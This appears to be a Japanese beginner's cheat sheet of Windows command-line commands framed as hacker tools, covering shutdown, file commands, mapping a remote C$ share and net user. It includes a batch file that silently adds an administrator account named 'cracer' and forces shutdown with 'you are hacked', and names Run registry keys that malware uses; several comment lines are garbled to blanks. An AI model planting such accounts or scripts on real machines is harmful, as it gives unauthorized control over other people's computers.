Hackがよく使う情報セキュリティコマンド(2)winシステム

1409 ワード

shutdown-s-t 180-c「あなたが言うテキストを入力します」
  • shutdown-a(このシャットダウンをキャンセル)
  • -sシャットダウン
  • -r再起動
  • -tカウントダウン
  • -c「入力テキスト」
  • 一つに書くbatファイル
    copy con c:\123.txt新しいファイルの作成
  • Ctrl+zを押して、緩めてenter、新しいファイルの編纂内容は
  • を完成します
    mdディレクトリの作成
    rdフォルダの削除
    delファイル名
    ren元ファイル名新ファイル名名前変更コマンド
    typeコマンドラインの下でファイルを表示
    startファイルを起動または開く
    net use k:\\192.168.85.110c$110というipのパソコンCディスクを、私たちのKディスクにマッピングします(ping通を前提にして、ユーザー名とパスワードを入力して、ログインすることができます.そうしないと、ツールが解読されます).
    net use k:\\192.168.85.110c$/delこのマッピングを切断
    Netstartはどのようなサービスを開いているかを確認します
    Netstartサービス名、サービス開始、停止はstop
    次のコマンドは重要です.
    net user        ,      
    net user cracer 123 /add     cracer      123(        )
    net localgroup administrators cracer /add(  cracer          )
    net user cracer /del(      )
    net user guset /active:yes (  guest  ) 
    net share (         )
    
              
    c:\>copy con c:\123.bat
    net user cracer 123 /add
    net localgroup administrators cracer /add
    shutdown -s -t 180 -c "you are hacked by cracer" (ctrl+z)         
      123.bat     ,     cracer     ,                
    

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
  • この3つのレジストリの内容をよくチェックし、ウイルスが好きな場所